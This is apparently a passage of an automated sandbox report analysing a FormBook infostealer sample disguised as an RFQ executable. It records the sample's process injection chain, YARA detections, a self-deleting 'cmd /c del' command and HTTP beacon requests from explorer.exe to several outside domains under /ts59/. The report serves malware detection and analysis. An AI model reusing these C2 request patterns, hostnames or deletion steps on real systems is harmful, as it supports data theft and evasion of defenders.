                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.94971176.223.105.230803504C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 3, 2024 17:26:15.356501102 CEST182OUTGET /ts59/?Upql=FhTWpBv2wlHh+xqdnZr3Px/MyxZeSSML3WZDSneysGfSXRBJ9ZV2+MGZCGSdE3MN2wai&S0GhCH=DR-Lh8FH5BP HTTP/1.1
                                            Host: www.kgstrengthandperformance.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Jul 3, 2024 17:26:15.855463028 CEST431INHTTP/1.1 301 Moved Permanently
                                            location: https://kgstrengthandperformance.com/ts59/?Upql=FhTWpBv2wlHh+xqdnZr3Px/MyxZeSSML3WZDSneysGfSXRBJ9ZV2+MGZCGSdE3MN2wai&S0GhCH=DR-Lh8FH5BP
                                            vary: Accept-Encoding
                                            server: DPS/2.0.0+sha-aaf97e5
                                            x-version: aaf97e5
                                            x-siteid: us-east-1
                                            set-cookie: dps_site_id=us-east-1; path=/
                                            date: Wed, 03 Jul 2024 15:26:15 GMT
                                            keep-alive: timeout=5
                                            transfer-encoding: chunked
                                            connection: close
                                            Data Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            2192.168.2.9497143.64.163.50803504C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 3, 2024 17:26:54.930423021 CEST166OUTGET /ts59/?Upql=Q0rerqlMM+Mzf1m4EVXcVVXnMVAfvTa9yYuOwxw9IZ3XTRGu1uzNDOvhpqi9CeNRWR+i&S0GhCH=DR-Lh8FH5BP HTTP/1.1
                                            Host: www.babyscan.xyz
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            3192.168.2.949715185.53.179.91803504C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 3, 2024 17:27:15.447591066 CEST185OUTGET /ts59/?S0GhCH=DR-Lh8FH5BP&Upql=mB8uG6w8zpafFuNLwvQmLBNoWWmhhT+Pa5pMyx7Kkg5PpWq+xUX3NBFKVrOgvyVjJmhQ HTTP/1.1
                                            Host: www.gb-electric-wheelchairs-8j.bond
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            4192.168.2.949716194.41.37.158803504C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 3, 2024 17:27:36.550599098 CEST164OUTGET /ts59/?Upql=eOJ5wRfCg8ODtwLT+RxU2vRwj/ifTX9ZHMiqr0Mmp4jM1anHRZ8cLTgQ01aLoU+CLIq0&S0GhCH=DR-Lh8FH5BP HTTP/1.1
                                            Host: www.76466.club
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:


                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:1
                                            Start time:11:25:16
                                            Start date:03/07/2024
                                            Path:C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe"
                                            Imagebase:0xe0000
                                            File size:1'081'856 bytes
                                            MD5 hash:11AB7D8A50CCAFBB4D7B5C9E83E4FF4C
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1432605564.0000000001890000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1432605564.0000000001890000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1432605564.0000000001890000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1432605564.0000000001890000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1432605564.0000000001890000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:2
                                            Start time:11:25:17
                                            Start date:03/07/2024
                                            Path:C:\Windows\SysWOW64\svchost.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe"
                                            Imagebase:0x650000
                                            File size:46'504 bytes
                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.1479792020.0000000002760000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1479792020.0000000002760000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1479792020.0000000002760000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.1479792020.0000000002760000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.1479792020.0000000002760000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.1479642617.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1479642617.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1479642617.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.1479642617.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.1479642617.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.1479901352.0000000002790000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1479901352.0000000002790000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1479901352.0000000002790000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.1479901352.0000000002790000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.1479901352.0000000002790000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:moderate
                                            Has exited:true

                                            General

                                            Target ID:3
                                            Start time:11:25:18
                                            Start date:03/07/2024
                                            Path:C:\Windows\explorer.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\Explorer.EXE
                                            Imagebase:0x7ff633410000
                                            File size:5'141'208 bytes
                                            MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:false

                                            General

                                            Target ID:4
                                            Start time:11:25:19
                                            Start date:03/07/2024
                                            Path:C:\Windows\SysWOW64\systray.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\SysWOW64\systray.exe"
                                            Imagebase:0x670000
                                            File size:9'728 bytes
                                            MD5 hash:28D565BB24D30E5E3DE8AFF6900AF098
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.3876371079.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3876371079.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3876371079.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.3876371079.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.3876371079.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.3875926072.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3875926072.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3875926072.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.3875926072.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.3875926072.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.3876413430.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3876413430.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3876413430.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.3876413430.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.3876413430.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:moderate
                                            Has exited:false

                                            General

                                            Target ID:5
                                            Start time:11:25:23
                                            Start date:03/07/2024
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:/c del "C:\Windows\SysWOW64\svchost.exe"
                                            Imagebase:0xc50000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:6
                                            Start time:11:25:23
                                            Start date:03/07/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff70f010000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Disassembly

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:4%
                                              Dynamic/Decrypted Code Coverage:1.5%
                                              Signature Coverage:6.6%
                                              Total number of Nodes:2000
                                              Total number of Limit Nodes:164
                                              execution_graph 98120 e107d 98125 e71eb 98120->98125 98122 e108c 98156 102f80 98122->98156 98126 e71fb __write_nolock 98125->98126 98159 e77c7 98126->98159 98130 e72ba 98171 10074f 98130->98171 98137 e77c7 59 API calls 98138 e72eb 98137->98138 98190 e7eec 98138->98190 98140 e72f4 RegOpenKeyExW 98141 11ecda RegQueryValueExW 98140->98141 98145 e7316 Mailbox 98140->98145 98142 11ecf7 98141->98142 98143 11ed6c RegCloseKey 98141->98143 98194 100ff6 98142->98194 98143->98145 98155 11ed7e _wcscat Mailbox __wsetenvp 98143->98155 98145->98122 98146 11ed10 98204 e538e 98146->98204 98149 11ed38 98207 e7d2c 98149->98207 98150 e7b52 59 API calls 98150->98155 98152 11ed52 98152->98143 98154 e3f84 59 API calls 98154->98155 98155->98145 98155->98150 98155->98154 98216 e7f41 98155->98216 98281 102e84 98156->98281 98158 e1096 98160 100ff6 Mailbox 59 API calls 98159->98160 98161 e77e8 98160->98161 98162 100ff6 Mailbox 59 API calls 98161->98162 98163 e72b1 98162->98163 98164 e4864 98163->98164 98220 111b90 98164->98220 98167 e7f41 59 API calls 98168 e4897 98167->98168 98222 e48ae 98168->98222 98170 e48a1 Mailbox 98170->98130 98172 111b90 __write_nolock 98171->98172 98173 10075c GetFullPathNameW 98172->98173 98174 10077e 98173->98174 98175 e7d2c 59 API calls 98174->98175 98176 e72c5 98175->98176 98177 e7e0b 98176->98177 98178 e7e1f 98177->98178 98179 11f173 98177->98179 98244 e7db0 98178->98244 98249 e8189 98179->98249 98182 e72d3 98184 e3f84 98182->98184 98183 11f17e __wsetenvp _memmove 98185 e3f92 98184->98185 98189 e3fb4 _memmove 98184->98189 98187 100ff6 Mailbox 59 API calls 98185->98187 98186 100ff6 Mailbox 59 API calls 98188 e3fc8 98186->98188 98187->98189 98188->98137 98189->98186 98191 e7ef9 98190->98191 98192 e7f06 98190->98192 98191->98140 98193 100ff6 Mailbox 59 API calls 98192->98193 98193->98191 98197 100ffe 98194->98197 98196 101018 98196->98146 98197->98196 98199 10101c std::exception::exception 98197->98199 98252 10594c 98197->98252 98269 1035e1 DecodePointer 98197->98269 98270 1087db RaiseException 98199->98270 98201 101046 98271 108711 58 API calls _free 98201->98271 98203 101058 98203->98146 98205 100ff6 Mailbox 59 API calls 98204->98205 98206 e53a0 RegQueryValueExW 98205->98206 98206->98149 98206->98152 98208 e7d38 __wsetenvp 98207->98208 98209 e7da5 98207->98209 98212 e7d4e 98208->98212 98213 e7d73 98208->98213 98210 e7e8c 59 API calls 98209->98210 98211 e7d56 _memmove 98210->98211 98211->98152 98280 e8087 59 API calls Mailbox 98212->98280 98215 e8189 59 API calls 98213->98215 98215->98211 98217 e7f50 __wsetenvp _memmove 98216->98217 98218 100ff6 Mailbox 59 API calls 98217->98218 98219 e7f8e 98218->98219 98219->98155 98221 e4871 GetModuleFileNameW 98220->98221 98221->98167 98223 111b90 __write_nolock 98222->98223 98224 e48bb GetFullPathNameW 98223->98224 98225 e48da 98224->98225 98226 e48f7 98224->98226 98227 e7d2c 59 API calls 98225->98227 98228 e7eec 59 API calls 98226->98228 98229 e48e6 98227->98229 98228->98229 98232 e7886 98229->98232 98233 e7894 98232->98233 98236 e7e8c 98233->98236 98235 e48f2 98235->98170 98237 e7e9a 98236->98237 98239 e7ea3 _memmove 98236->98239 98237->98239 98240 e7faf 98237->98240 98239->98235 98241 e7fc2 98240->98241 98243 e7fbf _memmove 98240->98243 98242 100ff6 Mailbox 59 API calls 98241->98242 98242->98243 98243->98239 98245 e7dbf __wsetenvp 98244->98245 98246 e8189 59 API calls 98245->98246 98247 e7dd0 _memmove 98245->98247 98248 11f130 _memmove 98246->98248 98247->98182 98250 100ff6 Mailbox 59 API calls 98249->98250 98251 e8193 98250->98251 98251->98183 98253 1059c7 98252->98253 98257 105958 98252->98257 98278 1035e1 DecodePointer 98253->98278 98255 1059cd 98279 108d68 58 API calls __getptd_noexit 98255->98279 98256 105963 98256->98257 98272 10a3ab 58 API calls __NMSG_WRITE 98256->98272 98273 10a408 58 API calls 6 library calls 98256->98273 98274 1032df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98256->98274 98257->98256 98260 10598b RtlAllocateHeap 98257->98260 98263 1059b3 98257->98263 98267 1059b1 98257->98267 98275 1035e1 DecodePointer 98257->98275 98260->98257 98261 1059bf 98260->98261 98261->98197 98276 108d68 58 API calls __getptd_noexit 98263->98276 98277 108d68 58 API calls __getptd_noexit 98267->98277 98269->98197 98270->98201 98271->98203 98272->98256 98273->98256 98275->98257 98276->98267 98277->98261 98278->98255 98279->98261 98280->98211 98282 102e90 __alloc_osfhnd 98281->98282 98289 103457 98282->98289 98288 102eb7 __alloc_osfhnd 98288->98158 98306 109e4b 98289->98306 98291 102e99 98292 102ec8 DecodePointer DecodePointer 98291->98292 98293 102ef5 98292->98293 98294 102ea5 98292->98294 98293->98294 98352 1089e4 59 API calls __fclose_nolock 98293->98352 98303 102ec2 98294->98303 98296 102f58 EncodePointer EncodePointer 98296->98294 98297 102f2c 98297->98294 98301 102f46 EncodePointer 98297->98301 98354 108aa4 61 API calls 2 library calls 98297->98354 98298 102f07 98298->98296 98298->98297 98353 108aa4 61 API calls 2 library calls 98298->98353 98301->98296 98302 102f40 98302->98294 98302->98301 98355 103460 98303->98355 98307 109e5c 98306->98307 98308 109e6f EnterCriticalSection 98306->98308 98313 109ed3 98307->98313 98308->98291 98310 109e62 98310->98308 98337 1032f5 58 API calls 3 library calls 98310->98337 98314 109edf __alloc_osfhnd 98313->98314 98315 109f00 98314->98315 98316 109ee8 98314->98316 98325 109f21 __alloc_osfhnd 98315->98325 98341 108a5d 58 API calls __malloc_crt 98315->98341 98338 10a3ab 58 API calls __NMSG_WRITE 98316->98338 98318 109eed 98339 10a408 58 API calls 6 library calls 98318->98339 98321 109f15 98323 109f2b 98321->98323 98324 109f1c 98321->98324 98322 109ef4 98340 1032df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98322->98340 98326 109e4b __lock 58 API calls 98323->98326 98342 108d68 58 API calls __getptd_noexit 98324->98342 98325->98310 98329 109f32 98326->98329 98331 109f57 98329->98331 98332 109f3f 98329->98332 98344 102f95 98331->98344 98343 10a06b InitializeCriticalSectionAndSpinCount 98332->98343 98335 109f4b 98350 109f73 LeaveCriticalSection _doexit 98335->98350 98338->98318 98339->98322 98341->98321 98342->98325 98343->98335 98345 102f9e RtlFreeHeap 98344->98345 98349 102fc7 __dosmaperr 98344->98349 98346 102fb3 98345->98346 98345->98349 98351 108d68 58 API calls __getptd_noexit 98346->98351 98348 102fb9 GetLastError 98348->98349 98349->98335 98350->98325 98351->98348 98352->98298 98353->98297 98354->98302 98358 109fb5 LeaveCriticalSection 98355->98358 98357 102ec7 98357->98288 98358->98357 98359 107e93 98360 107e9f __alloc_osfhnd 98359->98360 98396 10a048 GetStartupInfoW 98360->98396 98362 107ea4 98398 108dbc GetProcessHeap 98362->98398 98364 107efc 98365 107f07 98364->98365 98481 107fe3 58 API calls 3 library calls 98364->98481 98399 109d26 98365->98399 98368 107f0d 98369 107f18 __RTC_Initialize 98368->98369 98482 107fe3 58 API calls 3 library calls 98368->98482 98420 10d812 98369->98420 98372 107f27 98373 107f33 GetCommandLineW 98372->98373 98483 107fe3 58 API calls 3 library calls 98372->98483 98439 115173 GetEnvironmentStringsW 98373->98439 98376 107f32 98376->98373 98379 107f4d 98380 107f58 98379->98380 98484 1032f5 58 API calls 3 library calls 98379->98484 98449 114fa8 98380->98449 98383 107f5e 98384 107f69 98383->98384 98485 1032f5 58 API calls 3 library calls 98383->98485 98463 10332f 98384->98463 98387 107f71 98388 107f7c __wwincmdln 98387->98388 98486 1032f5 58 API calls 3 library calls 98387->98486 98469 e492e 98388->98469 98391 107f90 98392 107f9f 98391->98392 98487 103598 58 API calls _doexit 98391->98487 98488 103320 58 API calls _doexit 98392->98488 98395 107fa4 __alloc_osfhnd 98397 10a05e 98396->98397 98397->98362 98398->98364 98489 1033c7 36 API calls 2 library calls 98399->98489 98401 109d2b 98490 109f7c InitializeCriticalSectionAndSpinCount __alloc_osfhnd 98401->98490 98403 109d30 98404 109d34 98403->98404 98492 109fca TlsAlloc 98403->98492 98491 109d9c 61 API calls 2 library calls 98404->98491 98407 109d39 98407->98368 98408 109d46 98408->98404 98409 109d51 98408->98409 98493 108a15 98409->98493 98412 109d93 98501 109d9c 61 API calls 2 library calls 98412->98501 98415 109d72 98415->98412 98417 109d78 98415->98417 98416 109d98 98416->98368 98500 109c73 58 API calls 4 library calls 98417->98500 98419 109d80 GetCurrentThreadId 98419->98368 98421 10d81e __alloc_osfhnd 98420->98421 98422 109e4b __lock 58 API calls 98421->98422 98423 10d825 98422->98423 98424 108a15 __calloc_crt 58 API calls 98423->98424 98425 10d836 98424->98425 98426 10d8a1 GetStartupInfoW 98425->98426 98427 10d841 __alloc_osfhnd @_EH4_CallFilterFunc@8 98425->98427 98433 10d8b6 98426->98433 98434 10d9e5 98426->98434 98427->98372 98428 10daad 98515 10dabd LeaveCriticalSection _doexit 98428->98515 98430 108a15 __calloc_crt 58 API calls 98430->98433 98431 10da32 GetStdHandle 98431->98434 98432 10da45 GetFileType 98432->98434 98433->98430 98433->98434 98435 10d904 98433->98435 98434->98428 98434->98431 98434->98432 98514 10a06b InitializeCriticalSectionAndSpinCount 98434->98514 98435->98434 98436 10d938 GetFileType 98435->98436 98513 10a06b InitializeCriticalSectionAndSpinCount 98435->98513 98436->98435 98440 115184 98439->98440 98441 107f43 98439->98441 98516 108a5d 58 API calls __malloc_crt 98440->98516 98445 114d6b GetModuleFileNameW 98441->98445 98443 1151c0 FreeEnvironmentStringsW 98443->98441 98444 1151aa _memmove 98444->98443 98446 114d9f _wparse_cmdline 98445->98446 98448 114ddf _wparse_cmdline 98446->98448 98517 108a5d 58 API calls __malloc_crt 98446->98517 98448->98379 98450 114fc1 __wsetenvp 98449->98450 98451 114fb9 98449->98451 98452 108a15 __calloc_crt 58 API calls 98450->98452 98451->98383 98456 114fea __wsetenvp 98452->98456 98453 115041 98454 102f95 _free 58 API calls 98453->98454 98454->98451 98455 108a15 __calloc_crt 58 API calls 98455->98456 98456->98451 98456->98453 98456->98455 98457 115066 98456->98457 98460 11507d 98456->98460 98518 114857 58 API calls __fclose_nolock 98456->98518 98458 102f95 _free 58 API calls 98457->98458 98458->98451 98519 109006 IsProcessorFeaturePresent 98460->98519 98462 115089 98462->98383 98464 10333b __IsNonwritableInCurrentImage 98463->98464 98542 10a711 98464->98542 98466 103359 __initterm_e 98467 102f80 __cinit 67 API calls 98466->98467 98468 103378 __cinit __IsNonwritableInCurrentImage 98466->98468 98467->98468 98468->98387 98470 e4948 98469->98470 98480 e49e7 98469->98480 98471 e4982 IsThemeActive 98470->98471 98545 1035ac 98471->98545 98475 e49ae 98557 e4a5b SystemParametersInfoW SystemParametersInfoW 98475->98557 98477 e49ba 98558 e3b4c 98477->98558 98479 e49c2 SystemParametersInfoW 98479->98480 98480->98391 98481->98365 98482->98369 98483->98376 98487->98392 98488->98395 98489->98401 98490->98403 98491->98407 98492->98408 98495 108a1c 98493->98495 98496 108a57 98495->98496 98498 108a3a 98495->98498 98502 115446 98495->98502 98496->98412 98499 10a026 TlsSetValue 98496->98499 98498->98495 98498->98496 98510 10a372 Sleep 98498->98510 98499->98415 98500->98419 98501->98416 98503 115451 98502->98503 98509 11546c 98502->98509 98504 11545d 98503->98504 98503->98509 98511 108d68 58 API calls __getptd_noexit 98504->98511 98506 11547c RtlAllocateHeap 98507 115462 98506->98507 98506->98509 98507->98495 98509->98506 98509->98507 98512 1035e1 DecodePointer 98509->98512 98510->98498 98511->98507 98512->98509 98513->98435 98514->98434 98515->98427 98516->98444 98517->98448 98518->98456 98520 109011 98519->98520 98525 108e99 98520->98525 98524 10902c 98524->98462 98526 108eb3 _memset ___raise_securityfailure 98525->98526 98527 108ed3 IsDebuggerPresent 98526->98527 98533 10a395 SetUnhandledExceptionFilter UnhandledExceptionFilter 98527->98533 98530 108f97 ___raise_securityfailure 98534 10c836 98530->98534 98531 108fba 98532 10a380 GetCurrentProcess TerminateProcess 98531->98532 98532->98524 98533->98530 98535 10c840 IsProcessorFeaturePresent 98534->98535 98536 10c83e 98534->98536 98538 115b5a 98535->98538 98536->98531 98541 115b09 5 API calls ___raise_securityfailure 98538->98541 98540 115c3d 98540->98531 98541->98540 98543 10a714 EncodePointer 98542->98543 98543->98543 98544 10a72e 98543->98544 98544->98466 98546 109e4b __lock 58 API calls 98545->98546 98547 1035b7 DecodePointer EncodePointer 98546->98547 98610 109fb5 LeaveCriticalSection 98547->98610 98549 e49a7 98550 103614 98549->98550 98551 103638 98550->98551 98552 10361e 98550->98552 98551->98475 98552->98551 98611 108d68 58 API calls __getptd_noexit 98552->98611 98554 103628 98612 108ff6 9 API calls __fclose_nolock 98554->98612 98556 103633 98556->98475 98557->98477 98559 e3b59 __write_nolock 98558->98559 98560 e77c7 59 API calls 98559->98560 98561 e3b63 GetCurrentDirectoryW 98560->98561 98613 e3778 98561->98613 98563 e3b8c IsDebuggerPresent 98564 e3b9a 98563->98564 98565 11d4ad MessageBoxA 98563->98565 98566 e3c73 98564->98566 98568 11d4c7 98564->98568 98569 e3bb7 98564->98569 98565->98568 98567 e3c7a SetCurrentDirectoryW 98566->98567 98572 e3c87 Mailbox 98567->98572 98823 e7373 59 API calls Mailbox 98568->98823 98694 e73e5 98569->98694 98572->98479 98573 11d4d7 98578 11d4ed SetCurrentDirectoryW 98573->98578 98575 e3bd5 GetFullPathNameW 98576 e7d2c 59 API calls 98575->98576 98577 e3c10 98576->98577 98710 f0a8d 98577->98710 98578->98572 98581 e3c2e 98582 e3c38 98581->98582 98824 144c03 AllocateAndInitializeSid CheckTokenMembership FreeSid 98581->98824 98726 e3a58 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 98582->98726 98586 11d50a 98586->98582 98588 11d51b 98586->98588 98590 e4864 61 API calls 98588->98590 98589 e3c42 98591 e3c55 98589->98591 98734 e43db 98589->98734 98592 11d523 98590->98592 98595 e7f41 59 API calls 98592->98595 98597 11d530 98595->98597 98598 11d53a 98597->98598 98599 11d55f 98597->98599 98610->98549 98611->98554 98612->98556 98614 e77c7 59 API calls 98613->98614 98615 e378e 98614->98615 98834 e3d43 98615->98834 98617 e37ac 98618 e4864 61 API calls 98617->98618 98619 e37c0 98618->98619 98620 e7f41 59 API calls 98619->98620 98621 e37cd 98620->98621 98848 e4f3d 98621->98848 98624 e37ee Mailbox 98872 e81a7 98624->98872 98625 11d3ae 98919 1497e5 98625->98919 98628 11d3cd 98631 102f95 _free 58 API calls 98628->98631 98633 11d3da 98631->98633 98635 e4faa 84 API calls 98633->98635 98637 11d3e3 98635->98637 98641 e3ee2 59 API calls 98637->98641 98638 e7f41 59 API calls 98639 e381a 98638->98639 98879 e8620 98639->98879 98643 11d3fe 98641->98643 98642 e382c Mailbox 98644 e7f41 59 API calls 98642->98644 98645 e3ee2 59 API calls 98643->98645 98646 e3852 98644->98646 98647 11d41a 98645->98647 98648 e8620 69 API calls 98646->98648 98649 e4864 61 API calls 98647->98649 98651 e3861 Mailbox 98648->98651 98650 11d43f 98649->98650 98652 e3ee2 59 API calls 98650->98652 98654 e77c7 59 API calls 98651->98654 98653 11d44b 98652->98653 98655 e81a7 59 API calls 98653->98655 98656 e387f 98654->98656 98657 11d459 98655->98657 98883 e3ee2 98656->98883 98659 e3ee2 59 API calls 98657->98659 98662 11d468 98659->98662 98667 e81a7 59 API calls 98662->98667 98663 e3899 98663->98637 98664 e38a3 98663->98664 98665 10313d _W_store_winword 60 API calls 98664->98665 98666 e38ae 98665->98666 98666->98643 98668 e38b8 98666->98668 98669 